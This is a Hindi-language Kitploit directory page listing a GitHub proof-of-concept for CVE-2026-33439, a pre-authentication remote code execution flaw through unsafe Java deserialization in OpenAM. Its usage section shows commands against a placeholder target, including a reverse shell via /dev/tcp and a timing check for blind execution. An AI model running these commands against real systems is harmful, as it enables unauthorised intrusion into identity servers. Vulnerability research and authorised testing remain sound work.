Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/rh33t/cve-2026-33439-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubrh33t/cve-2026-33439-poc

CVE-2026-33439-Poc

CVE-2026-33439 के लिए PoC, OpenAM में असुरक्षित Java deserialization के माध्यम से pre-auth RCE।

रिपॉजिटरी देखें
15घं 17मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33439

OpenIdentityPlatform OpenAM में jato.clientSession पैरामीटर के असुरक्षित Java डीसेरिएलाइज़ेशन के माध्यम से प्री-ऑथ RCE। प्रभावित <= 16.0.5, 16.0.6 में ठीक किया गया।

सलाह: https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj

उपयोग

root@kitploit:~
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'

आउटपुट ब्लाइंड है। कमांड समाप्त होने तक अनुरोध ब्लॉक रहता है, इसलिए टाइमिंग निष्पादन की पुष्टि करती है (--command 'sleep 5' में लगभग 5 सेकंड लगते हैं)।

केवल अधिकृत सुरक्षा परीक्षण के लिए।

टूल डाउनलोड करें